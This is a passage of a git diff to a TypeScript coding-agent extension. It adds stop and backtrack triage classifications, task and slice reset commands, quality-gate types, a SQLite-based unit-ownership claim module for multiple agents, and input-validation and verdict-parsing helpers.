+    c => c.status === "resolved" && !c.executed &&
+      (c.classification === "defer" || (c.classification as string) === "milestone"),
   );
-  if (deferred.length > 0) {
-    // Group deferred captures by target milestone
+  if (deferrable.length > 0) {
+    // Group captures that reference a specific milestone — create dirs as needed.
     const byMilestone = new Map<string, CaptureEntry[]>();
-    for (const cap of deferred) {
+    for (const cap of deferrable) {
       const target = cap.resolution?.match(/\b(M\d{3}(?:-[a-z0-9]{6})?)\b/)?.[1];
       if (target) {
         const list = byMilestone.get(target) ?? [];
@@ -330,12 +506,28 @@ export function executeTriageResolutions(
         if (created) {
           result.deferredMilestones++;
           result.actions.push(`Created milestone ${milestoneId} for ${captures.length} deferred capture(s)`);
-          for (const cap of captures) {
-            markCaptureExecuted(basePath, cap.id);
-          }
         }
       }
     }
+    // Stamp ALL defer/milestone captures as executed (#3542 gaps 1-3).
+    // Previously only captures that triggered dir creation were stamped.
+    // Captures without a milestone ID in resolution text, or targeting an
+    // existing directory, were silently dropped — never stamped.
+    for (const cap of deferrable) {
+      if (!cap.executed) {
+        markCaptureExecuted(basePath, cap.id);
+      }
+    }
+  }
+
+  // Mark note captures as executed — they're informational only, no action
+  // needed. Without this they stay in "resolved but not executed" limbo (#3578).
+  const notes = loadAllCaptures(basePath).filter(
+    c => c.status === "resolved" && !c.executed && c.classification === "note",
+  );
+  for (const cap of notes) {
+    markCaptureExecuted(basePath, cap.id);
+    result.actions.push(`Note acknowledged: ${cap.id} — "${cap.text}"`);
   }
 
   if (actionable.length === 0) return result;
@@ -373,5 +565,19 @@ export function executeTriageResolutions(
     }
   }
 
+  // Count stop/backtrack captures — these are handled by the pre-dispatch guard
+  // in runGuards(), not here. We just report them for logging purposes.
+  const allCaptures = loadAllCaptures(basePath);
+  for (const cap of allCaptures) {
+    if (cap.status !== "resolved" || cap.executed) continue;
+    if (cap.classification === "stop") {
+      result.stopped++;
+      result.actions.push(`Stop directive from ${cap.id}: "${cap.text}" — will pause on next dispatch`);
+    } else if (cap.classification === "backtrack") {
+      result.backtracks.push(cap);
+      result.actions.push(`Backtrack directive from ${cap.id}: "${cap.text}" — will trigger milestone regression on next dispatch`);
+    }
+  }
+
   return result;
 }
diff --git a/src/resources/extensions/gsd/triage-ui.ts b/src/resources/extensions/gsd/triage-ui.ts
index a9b81f46f..b2ea7cf4f 100644
--- a/src/resources/extensions/gsd/triage-ui.ts
+++ b/src/resources/extensions/gsd/triage-ui.ts
@@ -49,10 +49,18 @@ const CLASSIFICATION_LABELS: Record<Classification, { label: string; description
     label: "Note",
     description: "Informational only — no action needed.",
   },
+  "stop": {
+    label: "Stop",
+    description: "Halt auto-mode immediately — user directive to cease execution.",
+  },
+  "backtrack": {
+    label: "Backtrack",
+    description: "Abandon current milestone and return to a previous one.",
+  },
 };
 
 const ALL_CLASSIFICATIONS: Classification[] = [
-  "quick-task", "inject", "defer", "replan", "note",
+  "quick-task", "inject", "defer", "replan", "note", "stop", "backtrack",
 ];
 
 // ─── Public API ───────────────────────────────────────────────────────────────
@@ -83,8 +91,9 @@ export async function showTriageConfirmation(
     const capture = captureMap.get(result.captureId);
     if (!capture) continue;
 
-    // Auto-confirm note and defer — low-impact, no plan modification
-    if (result.classification === "note" || result.classification === "defer") {
+    // Auto-confirm note, defer, stop, and backtrack — low-impact or urgent directives
+    if (result.classification === "note" || result.classification === "defer"
+      || result.classification === "stop" || result.classification === "backtrack") {
       const resolution = result.classification === "note"
         ? "acknowledged as note"
         : `deferred${result.targetSlice ? ` to ${result.targetSlice}` : ""}`;
diff --git a/src/resources/extensions/gsd/types.ts b/src/resources/extensions/gsd/types.ts
index 5954923c4..e03815520 100644
--- a/src/resources/extensions/gsd/types.ts
+++ b/src/resources/extensions/gsd/types.ts
@@ -11,6 +11,7 @@ export type Phase =
   | "discussing"
   | "researching"
   | "planning"
+  | "evaluating-gates"
   | "executing"
   | "verifying"
   | "summarizing"
@@ -156,6 +157,8 @@ export interface Summary {
   whatHappened: string;
   deviations: string;
   filesModified: FileModified[];
+  followUps: string;
+  knownLimitations: string;
 }
 
 // ─── Continue-Here ─────────────────────────────────────────────────────────
@@ -246,6 +249,8 @@ export interface GSDState {
     slices?: { done: number; total: number };
     tasks?: { done: number; total: number };
   };
+  /** When phase=complete, holds the last completed milestone (instead of activeMilestone). */
+  lastCompletedMilestone?: ActiveRef | null;
 }
 
 // ─── Post-Unit Hook Types ─────────────────────────────────────────────────
@@ -311,6 +316,7 @@ export interface ClassificationResult {
   tier: ComplexityTier;
   reason: string;
   downgraded: boolean;
+  taskMetadata?: TaskMetadata;
 }
 
 export interface TaskMetadata {
@@ -447,6 +453,8 @@ export interface ParallelConfig {
   budget_ceiling?: number;
   merge_strategy: MergeStrategy;
   auto_merge: AutoMergeMode;
+  /** Optional model override for parallel milestone workers (e.g. "claude-haiku-4-5"). */
+  worker_model?: string;
 }
 
 // ─── Reactive Task Execution Types ───────────────────────────────────────
@@ -473,6 +481,8 @@ export interface ReactiveExecutionConfig {
   max_parallel: number;
   /** Isolation mode for parallel tasks within a slice. Currently only "same-tree" is supported. */
   isolation_mode: "same-tree";
+  /** Optional model override for subagents spawned during parallel execution. */
+  subagent_model?: string;
 }
 
 /** Per-slice reactive execution runtime state, persisted to disk. */
@@ -499,3 +509,112 @@ export interface BrowserFlowResult {
   checksPassed: number;
   duration: number;
 }
+
+// ─── Complete Task Params (gsd_complete_task tool input) ─────────────────
+
+export interface CompleteTaskParams {
+  taskId: string;
+  sliceId: string;
+  milestoneId: string;
+  oneLiner: string;
+  narrative: string;
+  verification: string;
+  /** @optional — defaults to [] when omitted by models with limited tool-calling */
+  keyFiles?: string[];
+  /** @optional — defaults to [] when omitted by models with limited tool-calling */
+  keyDecisions?: string[];
+  /** @optional — defaults to "None." when omitted */
+  deviations?: string;
+  /** @optional — defaults to "None." when omitted */
+  knownIssues?: string;
+  /** @optional — defaults to false when omitted */
+  blockerDiscovered?: boolean;
+  /** @optional — defaults to [] when omitted by models with limited tool-calling */
+  verificationEvidence?: Array<{
+    command: string;
+    exitCode: number;
+    verdict: string;
+    durationMs: number;
+  }>;
+  /** Optional caller-provided identity for audit trail */
+  actorName?: string;
+  /** Optional caller-provided reason this action was triggered */
+  triggerReason?: string;
+}
+
+// ─── Complete Slice Params (gsd_complete_slice tool input) ───────────────
+
+export interface CompleteSliceParams {
+  sliceId: string;
+  milestoneId: string;
+  sliceTitle: string;
+  oneLiner: string;
+  narrative: string;
+  verification: string;
+  uatContent: string;
+  /** @optional — defaults to [] when omitted by models with limited tool-calling */
+  keyFiles?: string[];
+  /** @optional — defaults to [] when omitted */
+  keyDecisions?: string[];
+  /** @optional — defaults to [] when omitted */
+  patternsEstablished?: string[];
+  /** @optional — defaults to [] when omitted */
+  observabilitySurfaces?: string[];
+  /** @optional — defaults to "None." when omitted */
+  deviations?: string;
+  /** @optional — defaults to "None." when omitted */
+  knownLimitations?: string;
+  /** @optional — defaults to "None." when omitted */
+  followUps?: string;
+  /** @optional — defaults to [] when omitted */
+  requirementsAdvanced?: Array<{ id: string; how: string }>;
+  /** @optional — defaults to [] when omitted */
+  requirementsValidated?: Array<{ id: string; proof: string }>;
+  /** @optional — defaults to [] when omitted */
+  requirementsSurfaced?: string[];
+  /** @optional — defaults to [] when omitted */
+  requirementsInvalidated?: Array<{ id: string; what: string }>;
+  /** @optional — defaults to [] when omitted */
+  filesModified?: Array<{ path: string; description: string }>;
+  /** @optional — defaults to [] when omitted */
+  provides?: string[];
+  /** @optional — defaults to [] when omitted */
+  requires?: Array<{ slice: string; provides: string }>;
+  /** @optional — defaults to [] when omitted */
+  affects?: string[];
+  /** @optional — defaults to [] when omitted */
+  drillDownPaths?: string[];
+  /** Optional caller-provided identity for audit trail */
+  actorName?: string;
+  /** Optional caller-provided reason this action was triggered */
+  triggerReason?: string;
+}
+
+// ─── Quality Gates ───────────────────────────────────────────────────────
+
+export type GateId = "Q3" | "Q4" | "Q5" | "Q6" | "Q7" | "Q8" | "MV01" | "MV02" | "MV03" | "MV04";
+export type GateScope = "slice" | "task" | "milestone";
+export type GateStatus = "pending" | "complete" | "omitted";
+export type GateVerdict = "pass" | "flag" | "omitted" | "";
+
+export interface GateRow {
+  milestone_id: string;
+  slice_id: string;
+  gate_id: GateId;
+  scope: GateScope;
+  task_id: string;
+  status: GateStatus;
+  verdict: GateVerdict;
+  rationale: string;
+  findings: string;
+  evaluated_at: string | null;
+}
+
+/** Configuration for parallel quality gate evaluation during slice planning. */
+export interface GateEvaluationConfig {
+  enabled: boolean;
+  /** Which slice-scoped gates to evaluate in parallel. Default: ['Q3', 'Q4']. */
+  slice_gates?: string[];
+  /** Whether to evaluate task-level gates (Q5/Q6/Q7) via reactive-execute. Default: true when enabled. */
+  task_gates?: boolean;
+}
diff --git a/src/resources/extensions/gsd/undo.ts b/src/resources/extensions/gsd/undo.ts
index a9b66c270..6443634c6 100644
--- a/src/resources/extensions/gsd/undo.ts
+++ b/src/resources/extensions/gsd/undo.ts
@@ -1,14 +1,20 @@
-// GSD Extension — Undo Last Unit
-// Rollback the most recent completed unit: revert git, remove state, uncheck plans.
+// GSD Extension — Undo Last Unit + Targeted State Reset
+// handleUndo: Rollback the most recent completed unit (revert git, remove state, uncheck plans).
+// handleUndoTask: Reset a single task's DB status to "pending" and re-render markdown.
+// handleResetSlice: Reset a slice and all its tasks, re-rendering plan + roadmap.
 
 import type { ExtensionCommandContext, ExtensionAPI } from "@gsd/pi-coding-agent";
-import { existsSync, readFileSync, writeFileSync, unlinkSync, readdirSync } from "node:fs";
-import { join } from "node:path";
+import { existsSync, readFileSync, unlinkSync, readdirSync } from "node:fs";
+import { join, basename } from "node:path";
 import { nativeRevertCommit, nativeRevertAbort } from "./native-git-bridge.js";
+import { atomicWriteSync } from "./atomic-write.js";
+import { parseUnitId } from "./unit-id.js";
 import { deriveState } from "./state.js";
 import { invalidateAllCaches } from "./cache.js";
-import { gsdRoot, resolveTasksDir, resolveSlicePath, buildTaskFileName } from "./paths.js";
+import { gsdRoot, resolveTasksDir, resolveSlicePath, resolveTaskFile, buildTaskFileName, buildSliceFileName } from "./paths.js";
 import { sendDesktopNotification } from "./notifications.js";
+import { getTask, getSlice, getSliceTasks, updateTaskStatus, updateSliceStatus } from "./gsd-db.js";
+import { renderPlanCheckboxes, renderRoadmapCheckboxes } from "./markdown-renderer.js";
 
 /**
  * Undo the last completed unit: revert git commits,
@@ -61,11 +67,11 @@ export async function handleUndo(args: string, ctx: ExtensionCommandContext, _pi
   }
 
   // 1. Delete summary artifact
-  const parts = unitId.split("/");
+  const { milestone, slice, task } = parseUnitId(unitId);
   let summaryRemoved = false;
-  if (parts.length === 3) {
+  if (task !== undefined && slice !== undefined) {
     // Task-level: M001/S01/T01
-    const [mid, sid, tid] = parts;
+    const [mid, sid, tid] = [milestone, slice, task];
     const tasksDir = resolveTasksDir(basePath, mid, sid);
     if (tasksDir) {
       const summaryFile = join(tasksDir, buildTaskFileName(tid, "SUMMARY"));
@@ -74,9 +80,9 @@ export async function handleUndo(args: string, ctx: ExtensionCommandContext, _pi
         summaryRemoved = true;
       }
     }
-  } else if (parts.length === 2) {
+  } else if (slice !== undefined) {
     // Slice-level: M001/S01
-    const [mid, sid] = parts;
+    const [mid, sid] = [milestone, slice];
     const slicePath = resolveSlicePath(basePath, mid, sid);
     if (slicePath) {
       for (const suffix of ["SUMMARY", "COMPLETE"]) {
@@ -91,8 +97,8 @@ export async function handleUndo(args: string, ctx: ExtensionCommandContext, _pi
 
   // 2. Uncheck task in PLAN if execute-task
   let planUpdated = false;
-  if (unitType === "execute-task" && parts.length === 3) {
-    const [mid, sid, tid] = parts;
+  if (unitType === "execute-task" && task !== undefined && slice !== undefined) {
+    const [mid, sid, tid] = [milestone, slice, task];
     planUpdated = uncheckTaskInPlan(basePath, mid, sid, tid);
   }
 
@@ -128,7 +134,247 @@ export async function handleUndo(args: string, ctx: ExtensionCommandContext, _pi
   }
 
   ctx.ui.notify(results.join("\n"), "success");
-  sendDesktopNotification("GSD", `Undone: ${unitType} (${unitId})`, "info", "complete");
+  sendDesktopNotification("GSD", `Undone: ${unitType} (${unitId})`, "info", "complete", basename(basePath));
+}
+
+// ─── Targeted State Reset ────────────────────────────────────────────────────
+
+/**
+ * Parse a task identifier from args. Accepts:
+ *   T01, S01/T01, M001/S01/T01
+ * Resolves missing parts from current state via deriveState().
+ */
+async function parseTaskId(
+  raw: string,
+  basePath: string,
+): Promise<{ mid: string; sid: string; tid: string } | string> {
+  const parts = raw.split("/");
+  if (parts.length === 3) {
+    return { mid: parts[0], sid: parts[1], tid: parts[2] };
+  }
+  // Need to resolve from state
+  const state = await deriveState(basePath);
+  if (parts.length === 2) {
+    // S01/T01 — resolve milestone
+    const mid = state.activeMilestone?.id;
+    if (!mid) return "Cannot resolve milestone — no active milestone in state.";
+    return { mid, sid: parts[0], tid: parts[1] };
+  }
+  if (parts.length === 1) {
+    // T01 — resolve milestone + slice
+    const mid = state.activeMilestone?.id;
+    const sid = state.activeSlice?.id;
+    if (!mid) return "Cannot resolve milestone — no active milestone in state.";
+    if (!sid) return "Cannot resolve slice — no active slice in state.";
+    return { mid, sid, tid: parts[0] };
+  }
+  return "Invalid task ID format. Use T01, S01/T01, or M001/S01/T01.";
+}
+
+/**
+ * Parse a slice identifier from args. Accepts:
+ *   S01, M001/S01
+ * Resolves missing milestone from current state.
+ */
+async function parseSliceId(
+  raw: string,
+  basePath: string,
+): Promise<{ mid: string; sid: string } | string> {
+  const parts = raw.split("/");
+  if (parts.length === 2) {
+    return { mid: parts[0], sid: parts[1] };
+  }
+  if (parts.length === 1) {
+    const state = await deriveState(basePath);
+    const mid = state.activeMilestone?.id;
+    if (!mid) return "Cannot resolve milestone — no active milestone in state.";
+    return { mid, sid: parts[0] };
+  }
+  return "Invalid slice ID format. Use S01 or M001/S01.";
+}
+
+/**
+ * Reset a single task's completion state:
+ * - Set DB status to "pending"
+ * - Delete the task summary file
+ * - Re-render plan checkboxes
+ */
+export async function handleUndoTask(
+  args: string,
+  ctx: ExtensionCommandContext,
+  _pi: ExtensionAPI,
+  basePath: string,
+): Promise<void> {
+  const force = args.includes("--force");
+  const rawId = args.replace("--force", "").trim();
+
+  if (!rawId) {
+    ctx.ui.notify(
+      "Usage: /gsd undo-task <taskId> [--force]\n\n" +
+      "Accepts: T01, S01/T01, or M001/S01/T01\n" +
+      "Resets the task's DB status to pending and re-renders plan checkboxes.",
+      "warning",
+    );
+    return;
+  }
+
+  const parsed = await parseTaskId(rawId, basePath);
+  if (typeof parsed === "string") {
+    ctx.ui.notify(parsed, "error");
+    return;
+  }
+
+  const { mid, sid, tid } = parsed;
+
+  // Validate task exists in DB
+  const task = getTask(mid, sid, tid);
+  if (!task) {
+    ctx.ui.notify(`Task ${mid}/${sid}/${tid} not found in database.`, "error");
+    return;
+  }
+
+  if (!force) {
+    ctx.ui.notify(
+      `Will reset: task ${mid}/${sid}/${tid}\n` +
+      `  Current status: ${task.status}\n` +
+      `This will:\n` +
+      `  - Set task status to "pending" in DB\n` +
+      `  - Delete task summary file (if exists)\n` +
+      `  - Re-render plan checkboxes\n\n` +
+      `Run /gsd undo-task ${rawId} --force to confirm.`,
+      "warning",
+    );
+    return;
+  }
+
+  // Reset DB status
+  updateTaskStatus(mid, sid, tid, "pending");
+
+  // Delete summary file
+  let summaryDeleted = false;
+  const summaryPath = resolveTaskFile(basePath, mid, sid, tid, "SUMMARY");
+  if (summaryPath && existsSync(summaryPath)) {
+    unlinkSync(summaryPath);
+    summaryDeleted = true;
+  }
+
+  // Re-render plan checkboxes
+  await renderPlanCheckboxes(basePath, mid, sid);
+
+  // Invalidate caches
+  invalidateAllCaches();
+
+  const results: string[] = [`Reset task ${mid}/${sid}/${tid} to "pending".`];
+  if (summaryDeleted) results.push("  - Deleted task summary file");
+  results.push("  - Plan checkboxes re-rendered");
+
+  ctx.ui.notify(results.join("\n"), "success");
+}
+
+/**
+ * Reset a slice and all its tasks:
+ * - Set all task DB statuses to "pending"
+ * - Set slice DB status to "active"
+ * - Delete task summary files, slice summary, and UAT files
+ * - Re-render plan + roadmap checkboxes
+ */
+export async function handleResetSlice(
+  args: string,
+  ctx: ExtensionCommandContext,
+  _pi: ExtensionAPI,
+  basePath: string,
+): Promise<void> {
+  const force = args.includes("--force");
+  const rawId = args.replace("--force", "").trim();
+
+  if (!rawId) {
+    ctx.ui.notify(
+      "Usage: /gsd reset-slice <sliceId> [--force]\n\n" +
+      "Accepts: S01 or M001/S01\n" +
+      "Resets the slice and all its tasks, re-renders plan + roadmap checkboxes.",
+      "warning",
+    );
+    return;
+  }
+
+  const parsed = await parseSliceId(rawId, basePath);
+  if (typeof parsed === "string") {
+    ctx.ui.notify(parsed, "error");
+    return;
+  }
+
+  const { mid, sid } = parsed;
+
+  // Validate slice exists in DB
+  const slice = getSlice(mid, sid);
+  if (!slice) {
+    ctx.ui.notify(`Slice ${mid}/${sid} not found in database.`, "error");
+    return;
+  }
+
+  const tasks = getSliceTasks(mid, sid);
+
+  if (!force) {
+    ctx.ui.notify(
+      `Will reset: slice ${mid}/${sid}\n` +
+      `  Current status: ${slice.status}\n` +
+      `  Tasks to reset: ${tasks.length}\n` +
+      `This will:\n` +
+      `  - Set all task statuses to "pending" in DB\n` +
+      `  - Set slice status to "active" in DB\n` +
+      `  - Delete task summary files, slice summary, and UAT files\n` +
+      `  - Re-render plan + roadmap checkboxes\n\n` +
+      `Run /gsd reset-slice ${rawId} --force to confirm.`,
+      "warning",
+    );
+    return;
+  }
+
+  // Reset all tasks
+  let tasksReset = 0;
+  let summariesDeleted = 0;
+  for (const t of tasks) {
+    updateTaskStatus(mid, sid, t.id, "pending");
+    tasksReset++;
+    const summaryPath = resolveTaskFile(basePath, mid, sid, t.id, "SUMMARY");
+    if (summaryPath && existsSync(summaryPath)) {
+      unlinkSync(summaryPath);
+      summariesDeleted++;
+    }
+  }
+
+  // Reset slice status
+  updateSliceStatus(mid, sid, "active");
+
+  // Delete slice summary and UAT files
+  let sliceFilesDeleted = 0;
+  const slicePath = resolveSlicePath(basePath, mid, sid);
+  if (slicePath) {
+    for (const suffix of ["SUMMARY", "UAT"]) {
+      const filePath = join(slicePath, buildSliceFileName(sid, suffix));
+      if (existsSync(filePath)) {
+        unlinkSync(filePath);
+        sliceFilesDeleted++;
+      }
+    }
+  }
+
+  // Re-render plan + roadmap checkboxes
+  await renderPlanCheckboxes(basePath, mid, sid);
+  await renderRoadmapCheckboxes(basePath, mid);
+
+  // Invalidate caches
+  invalidateAllCaches();
+
+  const results: string[] = [
+    `Reset slice ${mid}/${sid} to "active".`,
+    `  - ${tasksReset} task(s) reset to "pending"`,
+  ];
+  if (summariesDeleted > 0) results.push(`  - ${summariesDeleted} task summary file(s) deleted`);
+  if (sliceFilesDeleted > 0) results.push(`  - ${sliceFilesDeleted} slice file(s) deleted (summary/UAT)`);
+  results.push("  - Plan + roadmap checkboxes re-rendered");
+
+  ctx.ui.notify(results.join("\n"), "success");
 }
 
 // ─── Helpers ──────────────────────────────────────────────────────────────────
@@ -148,7 +394,7 @@ export function uncheckTaskInPlan(basePath: string, mid: string, sid: string, ti
   const regex = new RegExp(`^(\\s*-\\s*)\\[x\\](\\s*\\**${tid}\\**[:\\s])`, "mi");
   if (regex.test(content)) {
     content = content.replace(regex, "$1[ ]$2");
-    writeFileSync(planFile, content, "utf-8");
+    atomicWriteSync(planFile, content);
     return true;
   }
   return false;
diff --git a/src/resources/extensions/gsd/unit-ownership.ts b/src/resources/extensions/gsd/unit-ownership.ts
new file mode 100644
index 000000000..acae94999
--- /dev/null
+++ b/src/resources/extensions/gsd/unit-ownership.ts
@@ -0,0 +1,275 @@
+// GSD Extension — Unit Ownership
+// Opt-in per-unit ownership claims for multi-agent safety.
+//
+// An agent can claim a unit (task, slice) before working on it.
+// complete-task and complete-slice enforce ownership when claims exist.
+// Claims are stored in SQLite (.gsd/unit-claims.db) for atomic
+// first-writer-wins semantics via INSERT OR IGNORE.
+//
+// Unit key format:
+//   task:  "<milestoneId>/<sliceId>/<taskId>"
+//   slice: "<milestoneId>/<sliceId>"
+//
+// Copyright (c) 2026 Jeremy McSpadden <jeremy@fluxlabs.net>
+
+import { createRequire } from "node:module";
+import { mkdirSync } from "node:fs";
+import { join } from "node:path";
+
+const _require = createRequire(import.meta.url);
+
+// ─── Types ───────────────────────────────────────────────────────────────
+
+export interface UnitClaim {
+  agent: string;
+  claimed_at: string;
+}
+
+// ─── SQLite Provider (mirrors gsd-db.ts pattern) ─────────────────────────
+
+interface StmtLike {
+  run(...params: unknown[]): unknown;
+  get(...params: unknown[]): Record<string, unknown> | undefined;
+}
+
+interface DbLike {
+  exec(sql: string): void;
+  prepare(sql: string): StmtLike;
+  close(): void;
+}
+
+type ProviderName = "node:sqlite" | "better-sqlite3";
+
+let providerName: ProviderName | null = null;
+let providerModule: unknown = null;
+let loadAttempted = false;
+
+function suppressSqliteWarning(): void {
+  const origEmit = process.emit;
+  // @ts-expect-error overriding process.emit for warning filter
+  process.emit = function (event: string, ...args: unknown[]): boolean {
+    if (
+      event === "warning" &&
+      args[0] &&
+      typeof args[0] === "object" &&
+      "name" in args[0] &&
+      (args[0] as { name: string }).name === "ExperimentalWarning" &&
+      "message" in args[0] &&
+      typeof (args[0] as { message: string }).message === "string" &&
+      (args[0] as { message: string }).message.includes("SQLite")
+    ) {
+      return false;
+    }
+    return origEmit.apply(process, [event, ...args] as Parameters<typeof process.emit>) as unknown as boolean;
+  };
+}
+
+function loadProvider(): void {
+  if (loadAttempted) return;
+  loadAttempted = true;
+
+  try {
+    suppressSqliteWarning();
+    const mod = _require("node:sqlite");
+    if (mod.DatabaseSync) {
+      providerModule = mod;
+      providerName = "node:sqlite";
+      return;
+    }
+  } catch {
+    // unavailable
+  }
+
+  try {
+    const mod = _require("better-sqlite3");
+    if (typeof mod === "function" || (mod && mod.default)) {
+      providerModule = mod.default || mod;
+      providerName = "better-sqlite3";
+      return;
+    }
+  } catch {
+    // unavailable
+  }
+}
+
+function normalizeRow(row: unknown): Record<string, unknown> | undefined {
+  if (row == null) return undefined;
+  if (Object.getPrototypeOf(row) === null) {
+    return { ...(row as Record<string, unknown>) };
+  }
+  return row as Record<string, unknown>;
+}
+
+function openRawDb(path: string): unknown {
+  loadProvider();
+  if (!providerModule || !providerName) return null;
+
+  if (providerName === "node:sqlite") {
+    const { DatabaseSync } = providerModule as {
+      DatabaseSync: new (path: string) => unknown;
+    };
+    return new DatabaseSync(path);
+  }
+
+  const Database = providerModule as new (path: string) => unknown;
+  return new Database(path);
+}
+
+function wrapDb(rawDb: unknown): DbLike {
+  const db = rawDb as {
+    exec(sql: string): void;
+    prepare(sql: string): {
+      run(...args: unknown[]): unknown;
+      get(...args: unknown[]): unknown;
+    };
+    close(): void;
+  };
+  return {
+    exec(sql: string): void { db.exec(sql); },
+    prepare(sql: string): StmtLike {
+      const raw = db.prepare(sql);
+      return {
+        run(...params: unknown[]): unknown { return raw.run(...params); },
+        get(...params: unknown[]): Record<string, unknown> | undefined {
+          return normalizeRow(raw.get(...params));
+        },
+      };
+    },
+    close(): void { db.close(); },
+  };
+}
+
+// ─── Per-basePath DB pool ────────────────────────────────────────────────
+
+const dbPool = new Map<string, DbLike>();
+
+function claimsDbPath(basePath: string): string {
+  return join(basePath, ".gsd", "unit-claims.db");
+}
+
+function getDb(basePath: string): DbLike | null {
+  const existing = dbPool.get(basePath);
+  if (existing) return existing;
+  return null;
+}
+
+// ─── Key Builders ────────────────────────────────────────────────────────
+
+export function taskUnitKey(milestoneId: string, sliceId: string, taskId: string): string {
+  return `${milestoneId}/${sliceId}/${taskId}`;
+}
+
+export function sliceUnitKey(milestoneId: string, sliceId: string): string {
+  return `${milestoneId}/${sliceId}`;
+}
+
+// ─── Lifecycle ───────────────────────────────────────────────────────────
+
+/**
+ * Initialize the ownership SQLite database for a given basePath.
+ * Creates .gsd/ directory and unit-claims.db with the unit_claims table.
+ * Safe to call multiple times (idempotent).
+ */
+export function initOwnershipTable(basePath: string): void {
+  if (dbPool.has(basePath)) return;
+
+  const dir = join(basePath, ".gsd");
+  mkdirSync(dir, { recursive: true });
+
+  const raw = openRawDb(claimsDbPath(basePath));
+  if (!raw) {
+    throw new Error("No SQLite provider available for unit-ownership");
+  }
+
+  const db = wrapDb(raw);
+
+  db.exec("PRAGMA journal_mode=WAL");
+  db.exec("PRAGMA busy_timeout = 5000");
+  db.exec("PRAGMA synchronous = NORMAL");
+
+  db.exec(`
+    CREATE TABLE IF NOT EXISTS unit_claims (
+      unit_key TEXT PRIMARY KEY,
+      agent_name TEXT NOT NULL,
+      claimed_at TEXT NOT NULL
+    )
+  `);
+
+  dbPool.set(basePath, db);
+}
+
+/**
+ * Close the ownership database for a given basePath.
+ * Safe to call even if not initialized.
+ */
+export function closeOwnershipDb(basePath: string): void {
+  const db = dbPool.get(basePath);
+  if (!db) return;
+  try { db.close(); } catch { /* swallow */ }
+  dbPool.delete(basePath);
+}
+
+// ─── Public API ──────────────────────────────────────────────────────────
+
+/**
+ * Claim a unit for an agent.
+ * Uses INSERT OR IGNORE for atomic first-writer-wins semantics.
+ * Returns true if the claim was acquired (or the same agent already owns it).
+ * Returns false if a different agent already owns the unit.
+ */
+export function claimUnit(basePath: string, unitKey: string, agentName: string): boolean {
+  const db = getDb(basePath);
+  if (!db) {
+    // Auto-init if not already initialized (backward compat)
+    initOwnershipTable(basePath);
+    return claimUnit(basePath, unitKey, agentName);
+  }
+
+  // INSERT OR IGNORE: if the row already exists, this is a no-op.
+  // The PRIMARY KEY constraint on unit_key prevents duplicate claims.
+  db.prepare(
+    "INSERT OR IGNORE INTO unit_claims (unit_key, agent_name, claimed_at) VALUES (?, ?, ?)",
+  ).run(unitKey, agentName, new Date().toISOString());
+
+  // Check who owns it now
+  const row = db.prepare("SELECT agent_name FROM unit_claims WHERE unit_key = ?").get(unitKey);
+  const owner = row?.agent_name as string | undefined;
+
+  return owner === agentName;
+}
+
+/**
+ * Release a unit claim (remove it from the claims table).
+ */
+export function releaseUnit(basePath: string, unitKey: string): void {
+  const db = getDb(basePath);
+  if (!db) return;
+  db.prepare("DELETE FROM unit_claims WHERE unit_key = ?").run(unitKey);
+}
+
+/**
+ * Get the current owner of a unit, or null if unclaimed.
+ */
+export function getOwner(basePath: string, unitKey: string): string | null {
+  const db = getDb(basePath);
+  if (!db) return null;
+  const row = db.prepare("SELECT agent_name FROM unit_claims WHERE unit_key = ?").get(unitKey);
+  return (row?.agent_name as string) ?? null;
+}
+
+/**
+ * Check if an actor is authorized to operate on a unit.
+ * Returns null if ownership passes (or is unclaimed).
+ * Returns an error string if a different agent owns the unit.
+ */
+export function checkOwnership(
+  basePath: string,
+  unitKey: string,
+  actorName: string | undefined,
+): string | null {
+  if (!actorName) return null; // no actor identity provided — opt-in, so allow
+  const owner = getOwner(basePath, unitKey);
+  if (owner === null) return null; // unit unclaimed
+  if (owner === actorName) return null; // actor is the owner
+  return `Unit ${unitKey} is owned by ${owner}, not ${actorName}`;
+}
diff --git a/src/resources/extensions/gsd/unit-runtime.ts b/src/resources/extensions/gsd/unit-runtime.ts
index 8384ea401..a433ac9da 100644
--- a/src/resources/extensions/gsd/unit-runtime.ts
+++ b/src/resources/extensions/gsd/unit-runtime.ts
@@ -8,6 +8,7 @@ import {
   resolveTaskFile,
 } from "./paths.js";
 import { loadFile, parseTaskPlanMustHaves, countMustHavesMentionedInSummary } from "./files.js";
+import { parseUnitId } from "./unit-id.js";
 
 export type UnitRuntimePhase =
   | "dispatched"
@@ -128,7 +129,7 @@ export async function inspectExecuteTaskDurability(
   basePath: string,
   unitId: string,
 ): Promise<ExecuteTaskRecoveryStatus | null> {
-  const [mid, sid, tid] = unitId.split("/");
+  const { milestone: mid, slice: sid, task: tid } = parseUnitId(unitId);
   if (!mid || !sid || !tid) return null;
 
   const planAbs = resolveSliceFile(basePath, mid, sid, "PLAN");
diff --git a/src/resources/extensions/gsd/validation.ts b/src/resources/extensions/gsd/validation.ts
new file mode 100644
index 000000000..a64b3be6d
--- /dev/null
+++ b/src/resources/extensions/gsd/validation.ts
@@ -0,0 +1,23 @@
+/**
+ * Shared input-validation primitives for GSD tool handlers.
+ */
+
+/** Type guard: value is a string with at least one non-whitespace character. */
+export function isNonEmptyString(value: unknown): value is string {
+  return typeof value === "string" && value.trim().length > 0;
+}
+
+/**
+ * Validate that `value` is an array of non-empty strings.
+ * Throws with a message referencing `field` on failure.
+ * Returns the validated array (narrowed to string[]).
+ */
+export function validateStringArray(value: unknown, field: string): string[] {
+  if (!Array.isArray(value)) {
+    throw new Error(`${field} must be an array`);
+  }
+  if (value.some((item) => !isNonEmptyString(item))) {
+    throw new Error(`${field} must contain only non-empty strings`);
+  }
+  return value;
+}
diff --git a/src/resources/extensions/gsd/verdict-parser.ts b/src/resources/extensions/gsd/verdict-parser.ts
new file mode 100644
index 000000000..b0c0826b8
--- /dev/null
+++ b/src/resources/extensions/gsd/verdict-parser.ts
@@ -0,0 +1,110 @@
+/**
+ * Centralized verdict extraction, normalization, and schema validation.
+ *
+ * All verdict-related logic lives here so that normalization rules
+ * (e.g. `passed` → `pass`) are applied consistently across the codebase.
+ */
+
+import { extractUatType } from "./files.js";
+import type { UatType } from "./files.js";
+
+// ── Verdict extraction ──────────────────────────────────────────────────
+
+/**
+ * Extract and normalize the `verdict` value from YAML frontmatter.
+ *
+ * Normalization:
+ * - lowercased
+ * - `passed` → `pass`
+ *
+ * Returns `undefined` when frontmatter is absent or has no `verdict` field.
+ */
+export function extractVerdict(content: string): string | undefined {
+  // Primary: YAML frontmatter verdict (canonical format)
